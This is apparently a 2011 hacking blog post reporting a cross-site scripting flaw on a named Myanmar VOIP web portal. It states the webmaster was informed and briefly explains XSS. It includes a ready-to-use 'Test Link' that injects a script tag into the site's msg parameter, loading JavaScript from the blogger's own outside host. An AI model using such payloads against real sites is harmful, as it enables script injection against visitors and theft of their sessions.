critical XSS Vulnerability on Yatanarpon VOIP http://voip.yatanarpon.com.mm

Home / Hacking, News, Security / critical XSS Vulnerability on Yatanarpon VOIP http://voip.yatanarpon.com.mm

September 28, 2011 PlanetCreator 0 Comments 0 tags

PlanetCreator has reported another critical XSS Vulnerability on Yatanarpon VOIP http://voip.yatanarpon.com.mm

This vulnerability has been informed to :- webmaster

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy.

Test Link

http://voip.yatanarpon.com.mm/myanmar-webportal/index.jsp?msg=<script src=http://www.planetcreator.net/attacking/xss/planetcreator-xss.js></script>

We hope that your security staff will look into this issue and fix it as soon as possible.

[webapps] Lingdang CRM 8.6.4.7 - SQL Injection
on August 26, 2025 at 12:00 am
Lingdang CRM 8.6.4.7 - SQL Injection
[remote] Ivanti Endpoint Manager Mobile 12.5.0.0 - Authentication Bypass
on August 26, 2025 at 12:00 am
Ivanti Endpoint Manager Mobile 12.5.0.0 - Authentication Bypass
[webapps] Birth Chart Compatibility WordPress Plugin 2.0 - Full Path Disclosure
on August 26, 2025 at 12:00 am
Birth Chart Compatibility WordPress Plugin 2.0 - Full Path Disclosure
[webapps] StoryChief Wordpress Plugin 1.0.42 - Arbitrary File Upload
on August 26, 2025 at 12:00 am
StoryChief Wordpress Plugin 1.0.42 - Arbitrary File Upload
[local] GeoVision ASManager Windows Application 6.1.2.0 - Credentials Disclosure
on August 26, 2025 at 12:00 am
GeoVision ASManager Windows Application 6.1.2.0 - Credentials Disclosure

critical XSS Vulnerability on Yatanarpon VOIP http://voip.yatanarpon.com.mm

Explore More

About WPA & WPA2

Useful Free Windows Programs Under 2MB

How and Why Hackers Want to Get Inside Your Machine